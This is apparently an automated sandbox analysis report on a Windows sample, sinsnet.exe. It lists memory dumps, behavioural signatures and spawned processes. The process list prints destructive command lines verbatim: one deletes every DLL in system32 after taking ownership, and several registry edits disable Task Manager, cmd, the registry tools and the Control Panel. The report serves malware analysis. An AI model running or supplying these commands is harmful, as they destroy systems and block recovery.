memory/2944-2-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2732-4-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2784-3-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2908-5-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2400-6-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1328-7-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2024-8-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1752-9-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

memory/1444-11-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2308-12-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1656-14-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2452-13-0x000000013FAB0000-0x000000013FC50000-memory.dmp

memory/2524-15-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1052-16-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1812-17-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2980-18-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1620-19-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2896-20-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1320-21-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1588-22-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1540-23-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/684-24-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1704-25-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3052-26-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2156-27-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1640-28-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1600-29-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2568-30-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2412-31-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1636-32-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2720-33-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2792-34-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2972-35-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1040-36-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2528-37-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2712-38-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3104-39-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3216-40-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3260-41-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3324-42-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3352-43-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3404-44-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3436-45-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3524-46-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3576-47-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3624-48-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3652-49-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3720-50-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3752-51-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3784-52-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3828-53-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3856-54-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2452-55-0x000000013FAB0000-0x000000013FC50000-memory.dmp

memory/2944-56-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2732-58-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2784-57-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2908-59-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2400-60-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1328-61-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2024-62-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1752-63-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1444-64-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2308-65-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1656-66-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2524-67-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1052-68-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1812-69-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2980-70-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1620-71-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2896-72-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1320-73-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1588-74-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1540-75-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/684-76-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1704-77-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3052-78-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2156-79-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 09:36

Reported

2024-08-06 09:37

Platform

win10v2004-20240802-en

Max time kernel

27s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1020 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1020 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1020 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 712 wrote to memory of 1148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 712 wrote to memory of 1148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1020 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 416 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 416 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

